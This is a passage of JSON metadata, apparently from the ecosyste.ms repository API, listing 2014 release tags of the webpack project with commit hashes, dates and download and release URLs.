-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg: